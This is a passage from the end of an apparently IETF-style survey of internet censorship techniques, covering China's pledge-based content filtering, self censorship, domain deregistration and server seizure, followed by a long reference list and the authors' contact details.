   occur at the backbone/ISP level; China's army of monitors is a good
   example [47].  More commonly, manual filtering occurs at an
   institutional level.  Internet Content Providers (ICPs), such as
   Google or Weibo, require a business license to operate in China.
   One of the prerequisites for a business license is an agreement to
   sign a "voluntary pledge" known as the "Public Pledge on
   Self-discipline for the Chinese Internet Industry".  The failure to
   "energetically uphold" the pledged values can lead to the ICP being
   held liable for the offending content by the Chinese government
   [47].

6. Non-Technical Prevention

6.1. Self Censorship

   Self censorship is one of the most interesting and effective types
   of censorship; it is a mix of Bentham's Panopticon, cultural
   manipulation, intelligence gathering, and meatspace enforcement.
   Simply put, self censorship is when a censor creates an atmosphere
   where users censor themselves.  This can be achieved through
   controlling information, intimidating would-be dissidents, swaying
   public thought, and creating apathy.  Self censorship is difficult
   to document, as when it is implemented effectively the only
   noticeable trace is a lack of undesirable content; instead, one
   must look at the tools and techniques used by censors to encourage
   self censorship.  Controlling information relies on traditional
   censorship techniques or on forcing all users to connect through an
   intranet, such as in North Korea.  Intimidation is often achieved
   by allowing Internet users to post "whatever they want" but
   arresting those who post about dissenting views; this technique is
   incredibly common [48][49][50][51][52].  A good example of swaying
   public thought is China's "50-Cent Party", composed of somewhere
   between 20,000 [53] and 300,000 [54] contributors who are paid to
   "guide public thought" on local and regional issues as directed by
   the Ministry of Culture.  Creating apathy can be a side effect of
   successfully controlling information over time and is ideal for a
   censorship regime [55].

6.2. Domain Name Reallocation

   As domain names are resolved recursively, if a TLD deregisters a
   domain, all other DNS resolvers will be unable to properly forward
   and cache the site.  Domain name reallocation is only really a risk
   where undesirable content is hosted on a TLD controlled by the
   censoring country, such as .cn or .ru [56].

6.3. Server Takedown

   Servers must have a physical location somewhere in the world.  If
   undesirable content is hosted in the censoring country, the servers
   can be physically seized or the hosting provider can be required to
   prevent access [57].

7. References

   [1]  Glanville, J., "The Big Business of Net Censorship",
        November 2008.

   [2]  Dalek, J., "A Method for Identifying and Confirming the Use
        of URL Filtering Products for Censorship", October 2013.

   [3]  Crandall, J., "Empirical Study of a National-Scale
        Distributed Intrusion Detection System: Backbone-Level
        Filtering of HTML Responses in China", June 2010.

   [4]  Cheng, J., "Google stops Hong Kong auto-redirect as China
        plays hardball", June 2010.

   [5]  Zhu, T., "An Analysis of Chinese Search Engine Filtering",
        July 2011.

   [6]  Whittaker, Z., "1,168 keywords Skype uses to censor, monitor
        its Chinese users", March 2013.

   [7]  BBC News, "Google and Microsoft agree steps to block abuse
        images", November 2013.

   [8]  Condliffe, J., "Google Announces Massive New Restrictions on
        Child Abuse Search Terms", November 2013.

   [9]  Wagner, B., "Deep Packet Inspection and Internet Censorship:
        International Convergence on an 'Integrated Technology of
        Control'", June 2009.

   [10] Porter, T., "The Perils of Deep Packet Inspection",
        October 2010, <http://www.symantec.com/connect/articles/
        perils-deep-packet-inspection>.

   [11] Wilde, T., "Knock Knock Knockin' on Bridges' Doors",
        January 2012.

   [12] Wagstaff, J., "In Malaysia, online election battles take a
        nasty turn", May 2013.

   [13] EFF, "Hepting v. AT&T", updated December.

   [14] Hjelmvik, E. and W. John, "Breaking and Improving Protocol
        Obfuscation", July 2010.

   [15] Vine, S., "Technology Showcase on Traffic Classification:
        Why Measurements and Freeform Policy Matter", May 2014.

   [16] Anonymous, "How to Bypass Comcast's Bittorrent Throttling",
        October 2007.

   [17] Winter, P., "How China Is Blocking Tor", April 2012.
   [18] Anonymous, "GitHub blocked in China - how it happened, how to
        get around it, and where it will take us", January 2013.

   [19] Ensafi, R., "Detecting Intentional Packet Drops on the
        Internet via TCP/IP Side Channels", December 2013.

   [20] Aryan, S., Aryan, H., and J. Halderman, "Internet Censorship
        in Iran: A First Look", August 2013.

   [21] Weaver, S., "Detecting Forged TCP Packets", June 2009.

   [22] Weaver, S., "Detecting Forged TCP Packets", June 2009.

   [23] Weaver, S., "Detecting Forged TCP Packets", June 2009.

   [24] Anonymous, "TCP-RST Injection", June 2010.

   [25] Schoen, S., "EFF tests agree with AP: Comcast is forging
        packets to interfere with user traffic", October 2007.

   [26] von Lohmann, F., "FCC Rules Against Comcast for BitTorrent
        Blocking", August 2008.

   [27] Winter, P., "How China Is Blocking Tor", April 2012.

   [28] ViewDNS, "DNS Cache Poisoning in the People's Republic of
        China", September 6th.

   [29] Aryan, S., Aryan, H., and J. Halderman, "Internet Censorship
        in Iran: A First Look", August 2013.

   [30] Zmijewski, E., "Turkish Internet Censorship Takes a New
        Turn", March 2014.

   [31] Zmijewski, E., "Turkish Internet Censorship Takes a New
        Turn", March 2014.

   [32] AFP, "China Has Massive Internet Breakdown Reportedly Caused
        By Their Own Censoring Tools", January 2014.

   [33] Anonymous, "The Collateral Damage of Internet Censorship by
        DNS Injection", July 2012.

   [34] Albert, K., "DNS Tampering and the new ICANN gTLD Rules",
        June 2011.

   [35] Wikipedia, "Denial of Service Attacks".

   [36] Esposito, S., "Snowden Docs Show UK Spies Attacked Anonymous,
        Hackers", February 2014.

   [37] CMU CERT, "TCP SYN Flooding and IP Spoofing Attacks",
        November 2000.

   [38] Villeneuve, N., "Open Access: Chapter 8, Control and
        Resistance, Attacks on Burmese Opposition Media",
        December 2011.

   [39] Kravtsova, Y., "Cyberattacks Disrupt Opposition's Election",
        October 2012.

   [40] Orion, E., "Zimbabwe election hit by hacking and DDoS
        attacks", August 2013.

   [41] Muncaster, P., "Malaysian election sparks web blocking/DDoS
        claims", May 2013.

   [42] Dobie, M., "Junta tightens media screw", September 2007.

   [43] Heacock, R., "China Shuts Down Internet in Xinjiang Region
        After Riots", July 2009.

   [44] Cowie, J., "Egypt Leaves the Internet", January 2011.

   [45] Cowie, J., "Libyan Disconnect", February 2011.

   [46] Thomson, I., "Syria Cuts off Internet and Mobile
        Communication", November 2012.

   [47] BBC News, "China employs two million microblog monitors state
        media say", October 2013.

   [48] Calamur, K., "Prominent Egyptian Blogger Arrested",
        November 2013.

   [49] Associated Press, "Sattar Beheshti, Iranian Blogger, Was
        Beaten In Prison According To Prosecutor", December 2012.

   [50] Hopkins, C., "Communications Blocked in Libya, Qatari Blogger
        Arrested: This Week in Online Tyranny", March 2011.

   [51] The Guardian, "Chinese blogger jailed under crackdown on
        'internet rumours'", April 2014.

   [52] Johnson, L., "Torture feared in arrest of Iraqi blogger",
        February 2010.

   [53] Bristow, M., "China's internet 'spin doctors'",
        November 2013.

   [54] Fareed, M., "China joins a turf war", September 2008.

   [55] Gao, H., "Tiananmen, Forgotten", June 2014.
   [56] Anderson, R., "Access Denied: Tools and Technology of
        Internet Filtering", December 2011.

   [57] Murdoch, S., "Access Denied: Tools and Technology of
        Internet Filtering", December 2011.

   [58] Verkamp, J. and M. Gupta, "Inferring Mechanics of Web
        Censorship Around the World", August 2012.

   [59] Nabi, Z., "The Anatomy of Web Censorship in Pakistan",
        August 2013.

   [60] Aryan, S., Aryan, H., and J. Halderman, "Internet Censorship
        in Iran: A First Look", August 2013.

   [61] Jones, B., "Automated Detection and Fingerprinting of
        Censorship Block Pages", November 2014.

   [62] Rushe, D., "Bing censoring Chinese language search results
        for users in the US", February 2014.

   [63] Senft, A., "Asia Chats: Analyzing Information Controls and
        Privacy in Asian Messaging Applications", November 2013.

   [64] Clayton, R., "Ignoring the Great Firewall of China",
        January 2006.

   [65] Anonymous, "Towards a Comprehensive Picture of the Great
        Firewall's DNS Censorship", August 2014.

   [66] Khattak, S., "Towards Illuminating a Censorship Monitor's
        Model to Facilitate Evasion", August 2013.

Authors' Addresses

   Joseph L. Hall
   CDT

   Email: jhall@cdt.org

   Michael D. Aaron
   CU Boulder

   Email: michael.aaron@colorado.edu

   Ben Jones
   GA Tech

   Email: bjones99@gatech.edu